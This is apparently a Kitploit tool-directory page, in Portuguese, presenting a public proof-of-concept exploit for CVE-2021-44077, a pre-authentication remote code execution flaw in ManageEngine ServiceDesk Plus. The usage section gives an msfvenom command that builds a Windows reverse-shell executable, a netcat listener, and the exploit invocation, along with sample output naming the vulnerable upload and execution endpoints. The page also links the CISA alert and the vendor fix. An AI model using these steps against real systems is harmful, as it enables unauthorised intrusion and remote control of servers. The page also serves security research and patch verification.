Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44077 — Exploit de prova de conceito para RCE PreAuth no ManageEngine ServiceDesk Plus (CVE-2021-44077). Faz upload e executa executáveis Windows arbitrários em alvos vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/horizon3ai/cve-2021-44077
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Exploit de prova de conceito para RCE PreAuth no ManageEngine ServiceDesk Plus (CVE-2021-44077). Faz upload e executa executáveis Windows arbitrários em alvos vulneráveis.

Ver Repositório
3692há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44077

Exploit de Prova de Conceito para CVE-2021-44077: PreAuth RCE no ManageEngine ServiceDesk Plus < 11306

Baseado em:

  • https://xz.aliyun.com/t/10631

Aviso da CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Remediação (Atualize para a build 11306 ou posterior):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Testado no ManageEngine ServiceDesk Plus Build 11303. AV desabilitado.

Uso

O exploit faz upload de um executável Windows para o alvo e o executa.

Para explorar, primeiro gere qualquer executável. Por exemplo:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Faça pip install do arquivo de requisitos ou certifique-se de ter o pacote requests.

Se você está tentando capturar um reverse shell, execute seu listener primeiro, por exemplo:

root@kitploit:~
nc -l 4444

Então execute o script do exploit, passando os argumentos url e exe, por exemplo:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Exemplo de saída do script:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

Notas do Exploit

  • A vulnerabilidade permite fazer upload de qualquer arquivo para o diretório bin da instalação, incluindo arquivos existentes, como scripts batch. Pode haver outras formas de invocar o arquivo carregado.
  • Fazer upload diretamente de um web shell parece ser impedido por um filtro.

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta